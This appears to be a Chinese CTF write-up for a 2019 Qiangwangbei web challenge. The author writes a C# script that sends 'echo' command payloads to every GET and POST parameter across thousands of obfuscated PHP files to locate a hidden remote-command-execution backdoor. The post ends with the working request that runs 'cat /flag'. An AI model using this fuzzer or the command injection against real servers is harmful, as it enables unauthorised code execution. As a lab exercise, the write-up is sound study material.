[强网杯 2019]高明的黑客.md
首页长这样
离谱了
(草
这么多代码人工审计是不现实了(每日一题都不容易,这直接给我每日数千题QAQ),部署到了本地,尝试黑箱爆破
网上有大佬写好的exp,但是不会pythonQAQ,所以就用C#自己写了个(话说没有GIL,C#的多线程会不会比python快很多呢www)
using System.Text.RegularExpressions;
var dir = "/usr/share/nginx/html/src";
var files = Directory.GetFiles(dir);
var regexGet = new Regex(pattern: @"\$_GET\['(\w+)'\]");
var regexPost = new Regex(pattern: @"\$_POST\['(\w+)'\]");
var regexResponse = new Regex(pattern: @"maybeapayload");
Parallel.ForEach(files, file =>
{
using StreamReader reader = File.OpenText(file);
var content = reader.ReadToEnd();
var matches = regexGet.Matches(content);
var namesGet = new List<string>();
foreach (Match match in matches)
{
var nameGet = match.Groups[1].Value;
namesGet.Add(nameGet);
}
matches = regexPost.Matches(content);
var namesPost = new List<string>();
foreach (Match match in matches)
{
var namePost = match.Groups[1].Value;
namesPost.Add(namePost);
}
UriBuilder uriBuilder = new()
{
Host = "localhost",
Path = $"src/{Path.GetFileName(file)}",
Query = string.Join('&', namesGet.ConvertAll(nameGet => $"{nameGet}=echo maybeapayload"))
};
// Console.WriteLine(uriBuilder.Uri);
Dictionary<string, string> dict = new();
namesPost.ForEach(namePost => dict.Add(namePost, "echo maybeapayload"));
using HttpClient client = new HttpClient();
using var response = client.PostAsync(uriBuilder.Uri, new FormUrlEncodedContent(dict)).Result;
if (regexResponse.IsMatch(response.Content.ReadAsStringAsync().Result))
{
Console.WriteLine(file);
Console.WriteLine(response.Content.ReadAsStringAsync().Result);
}
});
跑完差不多花了4秒(打开优化的情况下),感觉效率蛮高
顺藤摸瓜找一找在php中出现的位置
这这这这藏得也太隐蔽了叭,出题人呕心沥血生成几千个文件来雷普萌新,他真的,我哭死==
/xk0SzyKwfzw.php?Efa5BVG=cat /flag
#Web #PHP #代码审计 #RCE #代码混淆